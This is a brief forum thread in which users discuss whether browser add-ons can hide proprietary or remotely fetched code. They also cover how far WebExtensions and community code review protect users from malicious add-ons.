How is it possible for add-ons to be proprietary

General discussion about web technology.
User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: How is it possible for add-ons to be proprietary

Post by GµårÐïåñ »

rehash wrote:So in conclusion the only way to be sure that by using an add-on you're running only free open software is to check:
  • its license
  • that all files in its XPI are source files and not binary files
  • every last line of its source code, because in one line it can fetch proprietary unknown code and execute it
This is a security and privacy nightmare. Is there any control over add-ons that are offered on addons.mozilla.org and over what they really do? Who checks this and how - for each new version? How can a user know which add-ons are trustworthy?
Pretty much, security is a proactive endeavor not a passive one. You can either trust that they are legit or do your due diligence, unfortunately not much in between. Theoretically WebExtensions alleviate this as they are for all intents and purposes limited to being pure scripted which should imply that you can't do that anymore, but you can theoretically still import external scripts, so there is that. There are I am sure script analyzers you can dump the code into and get a breakdown of what's in there and to expedite analysis a bit but again that's a matter of dealer's choice (meaning what works for you to feel comfortable with something) no one can really tell you how to approach your own piece of mind.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
rehash
Posts: 7
Joined: Sat Feb 17, 2018 11:05 am

Re: How is it possible for add-ons to be proprietary

Post by rehash »

Have there been lots of known cases of malicious add-ons in the past? Giorgio wrote that a pre-WebExtensions add-on could easily send your disk contents to a remote server https://hackademix.net/2017/12/11/noscr ... ermission/. Would the add-on community even be likely to discover something like that if the add-on was clever and stealthy?
Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: How is it possible for add-ons to be proprietary

Post by GµårÐïåñ »

If there is sufficient community involvement and code review around it, then yes.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Post Reply